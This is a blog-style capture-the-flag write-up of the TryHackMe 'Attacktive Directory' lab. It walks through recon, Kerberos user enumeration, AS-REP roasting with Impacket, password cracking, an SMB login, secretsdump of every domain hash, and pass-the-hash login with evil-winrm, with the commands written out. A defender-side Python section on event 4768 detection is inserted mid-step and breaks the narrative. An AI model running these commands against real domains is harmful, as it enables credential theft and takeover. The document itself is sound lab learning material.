---
title: Attacktive Directory on TryHackMe
date: 2024-03-03 21:10:04
tags:
  - AD
  - Active Directory
  - Windows
  - Pentesting
  - TryHackMe
---

## Before all

Link to the room on TryHackMe: [https://tryhackme.com/room/attacktivedirectory](https://tryhackme.com/room/attacktivedirectory)

What is AD? [Introduction on Wikipedia](https://zh.wikipedia.org/zh-tw/Active_Directory)

I once sat through Mars' AD course at 台灣好厲駭, but since it was my very first exposure and there was an explosive amount of material, I honestly didn't absorb much (concepts at best). I happened to see a pile of AD boxes on TryHackMe, so let's go hit them~

This machine sits in an AD network environment and plays the role of a Kerberos DC (Domain Controller).

With the benefit of hindsight, the attack chain for this box is:

:::info
Dictionary attack to find usernames -> brute-force svc-admin's password from its TGT -> log in to SMB as svc-admin and find the password backup file of user backup -> as backup, dump every user's hash via the DRSUAPI method -> log in as Administrator with a Pass The Hash attack
:::

Victim's IP : 10.10.162.250
Victim's Host : spookysec.local
Attacker's IP : 10.9.195.189

**Note:** remember to edit `/etc/hosts` and add the host name

## Write Up

### RECON

#### nmap

**Command**

`nmap -sC -sV -Pn 10.10.162.250`

**Result**

```
Nmap scan report for 10.10.162.143
Host is up (0.29s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-03 08:36:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-03-02T08:23:05
|_Not valid after:  2024-09-01T08:23:05
|_ssl-date: 2024-03-03T08:36:43+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-03-03T08:36:34+00:00
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-03-03T08:36:37
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
```

**Analyze**

There is an SMB service and RDP; the overall architecture is an AD network, and the host name is `spookysec.local`.

#### enum4linux

**Command**

`enum4linux -a spookysec.local`

**Result**

![image](https://hackmd.io/_uploads/rJCVc-zpT.png)
![image](https://hackmd.io/_uploads/rkwr5WzaT.png)

A lot of user data got dumped. Got the NetBIOS name, THM-AD (though judging from the later steps it didn't serve much purpose...).
#### kerbrute

A new tool; you can download it from GitHub: [Click Me : https://github.com/ropnop/kerbrute/releases](https://github.com/ropnop/kerbrute/releases)

Attack using the userlist.txt provided by the room (a password.txt is also provided for the hash cracking later on).

**Result**

![image](https://hackmd.io/_uploads/HyBxo-Ga6.png)

### Exploit

First, install the Impacket toolkit:

```bash
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
```

You may need to prefix `sudo` (many of the later attack steps need it too, so I won't repeat this).

#### TGT Attack with svc-admin

The principle behind obtaining the TGT is roughly that messages get hijacked during Kerberos authentication... (? I think).

**Note that my working directory at this point is `/opt/impacket/examples`.**

Attack using Impacket's `GetNPUsers.py`.

**Command**

```bash
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass
```

**Result**

![image](https://hackmd.io/_uploads/Skyfhbz6p.png)

**password cracking**

Dump the result from above into a file called `pass`:

`john pass --wordlist=passwordlist.txt`

![image](https://hackmd.io/_uploads/SkztnZGa6.png)

#### SMB to get backup's password

Not much in this step: just log in to the SMB service with the svc-hosts password obtained a moment ago.

`smbclient -U svc-admin //10.10.162.143/backup`

![image](https://hackmd.io/_uploads/B1cCh-z6a.png)

Password get!!
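The kerbrute user enumeration and the `GetNPUsers.py` AS-REP roast above both leave a clear trace on the domain controller in Security event 4768 ("A Kerberos authentication ticket (TGT) was requested"). The following is an added defender-side example, not code from the room or from Impacket/kerbrute: it runs two detection rules over constructed 4768 records (a burst of `KDC_ERR_C_PRINCIPAL_UNKNOWN` failures for many distinct names from one source, and a TGT issued with pre-authentication type 0 and RC4 encryption), and a third function audits `userAccountControl` values for the `DONT_REQ_PREAUTH` bit that makes an account roastable in the first place. The usernames other than `svc-admin` and `backup`, the IPs other than the attacker's, and the UAC values are constructed for the sample.

```python
"""Detection and audit logic for Kerberos username enumeration and
AS-REP roasting, keyed on the fields of Windows Security event 4768.
All sample records below are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

# 4768 field values used here:
#   status        0x0 = TGT issued, 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (no such user)
#   pre_auth_type 0   = logon without pre-authentication, 2 = encrypted timestamp (normal)
#   enc_type      0x17 = RC4-HMAC (offline-crackable AS-REP), 0x12 = AES256
def _ev(t, user, ip, status, pre_auth_type, enc_type):
    return {"time": datetime.fromisoformat(t), "user": user, "ip": ip,
            "status": status, "pre_auth_type": pre_auth_type, "enc_type": enc_type}

SAMPLE_4768 = (
    # ordinary workstation logons: pre-auth performed, AES ticket (constructed)
    [_ev("2024-03-03T08:30:00", "alice", "10.10.162.10", "0x0", 2, "0x12"),
     _ev("2024-03-03T08:31:00", "bob",   "10.10.162.11", "0x0", 2, "0x12")]
    # enumeration burst: 25 distinct non-existent names from one source within 25 s
    + [_ev(f"2024-03-03T08:40:{i:02d}", f"guess{i}", "10.9.195.189", "0x6", None, None)
       for i in range(25)]
    # AS-REP roast: TGT issued with no pre-auth and an RC4-encrypted reply
    + [_ev("2024-03-03T08:45:00", "svc-admin", "10.9.195.189", "0x0", 0, "0x17")]
    # one typo from a real workstation: a single failure, not a burst
    + [_ev("2024-03-03T09:00:00", "alcie", "10.10.162.10", "0x6", None, None)]
)


def find_enumeration_bursts(events, threshold=20, window=timedelta(seconds=60)):
    """Return {source_ip: distinct_unknown_names} for sources that produced at
    least `threshold` 0x6 failures for distinct usernames inside one `window`.
    A real user mistyping a name produces one or two of these, not dozens."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == "0x6":
            by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        for start in range(len(evs)):          # sliding window over the failures
            names = set()
            for e in evs[start:]:
                if e["time"] - evs[start]["time"] > window:
                    break
                names.add(e["user"].lower())
            if len(names) >= threshold:
                flagged[ip] = len(names)
                break
    return flagged


def find_asrep_roast_requests(events):
    """Return (user, source_ip) pairs where a TGT was issued without
    pre-authentication and with RC4 encryption: the exact shape of the
    AS-REP that GetNPUsers.py hands to john."""
    return [(e["user"], e["ip"]) for e in events
            if e["status"] == "0x0" and e["pre_auth_type"] == 0 and e["enc_type"] == "0x17"]


# userAccountControl bit "Do not require Kerberos preauthentication"
DONT_REQ_PREAUTH = 0x400000

def accounts_without_preauth(uac_by_user):
    """Given {sAMAccountName: userAccountControl} (e.g. from an LDAP export),
    return the accounts an AS-REP roast could target. The fix is to clear
    the bit; if the flag is genuinely needed, enforce a long random password."""
    return sorted(u for u, uac in uac_by_user.items() if uac & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    print("enumeration bursts:", find_enumeration_bursts(SAMPLE_4768))
    print("AS-REP roast requests:", find_asrep_roast_requests(SAMPLE_4768))
    # constructed UAC values: 0x200 NORMAL_ACCOUNT, 0x10000 DONT_EXPIRE_PASSWORD
    print("roastable accounts:", accounts_without_preauth(
        {"svc-admin": 0x400200, "backup": 0x10200, "alice": 0x200}))
```

In a real deployment the records come from the DC's Security log (4768 is produced by the "Audit Kerberos Authentication Service" subcategory); the two rules are independent, so a source that only triggers the burst rule is worth a look on its own, and a 0x17 no-pre-auth ticket for any account is worth an alert even when there is no preceding burst.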
![image](https://hackmd.io/_uploads/BJZXTWfT6.png)

#### backup to Administrator

Use `secretsdump.py` from Impacket together with backup's privileges to dump every user's password hash.

**Command**

`sudo python3 secretsdump.py -just-dc backup@spookysec.local`

**Result**

![image](https://hackmd.io/_uploads/SkG70Zfaa.png)

With the password hashes in hand, log in as admin with a Pass The Hash attack.

*What is a pass the hash attack?*

Read this: [https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67](https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67)

Use the `evil-winrm` tool to perform the Pass The Hash attack and log in directly.

**Command**

`evil-winrm -i 10.10.88.124 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc`

**Result**

![image](https://hackmd.io/_uploads/BkREJMzp6.png)

*RCE!!!*

**How to check your own identity inside AD:**

`Get-ADUser -Identity "Administrator" -Properties *`

## After all

After this box I feel I have picked up quite a few techniques; there is still a huge, huge amount of AD to learn, so I'll keep at it w

Attaching the RDP session, which wasn't much use for this box, but I made the most of it anyway:

![image](https://hackmd.io/_uploads/Hyq1xMfpp.png)

A hacker's romance~ Good night :>